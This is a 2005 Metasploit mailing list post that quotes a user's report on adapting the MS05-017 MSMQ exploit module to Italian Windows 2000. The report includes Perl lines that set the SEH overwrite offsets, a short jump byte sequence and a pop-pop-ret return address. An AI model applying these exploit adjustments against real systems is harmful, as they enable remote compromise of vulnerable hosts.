Metasploit mailing list archives
msmq_deleteobject_ms05_017.pm different offset for different languages
From: jerome.athias at free.fr (Jerome Athias)
Date: Tue, 13 Dec 2005 16:42:14 +0100
Oops, I read this too fast. I've already seen this (different offsets between US and FR) with French platforms, yes...

msf-list at jervus.it wrote:

Hi, I'm playing with msmq_deleteobject_ms05_017.pm with my win00 Italian version (SP0) and the exploit doesn't work; after a little debug session I understood why. For the Italian version the correct offset is 360, so I have added this:

# Windows 2000 Italian SP0 SEH offset
substr($pattern, 360 + $hlen + 0, 4, pack('V', $target->[1]));
substr($pattern, 360 + $hlen - 4, 2, "\xeb\x22");

For the English version (win00) the offset is:

# Windows 2000 SEH offset goes first
substr($pattern, 332 + $hlen + 0, 4, pack('V', $target->[1]));
substr($pattern, 332 + $hlen - 4, 2, "\xeb\x22");

It's the same for the Win00 Advanced Server Italian version (SP4). The only difference is the offset; the return address is always x004014e9 (pop pop ret).

Does someone know if it is the same for different languages? For example the French, Spanish or German version of win00?

Thank you for your attention, and sorry for my bad English :-(

Ciao
Acaro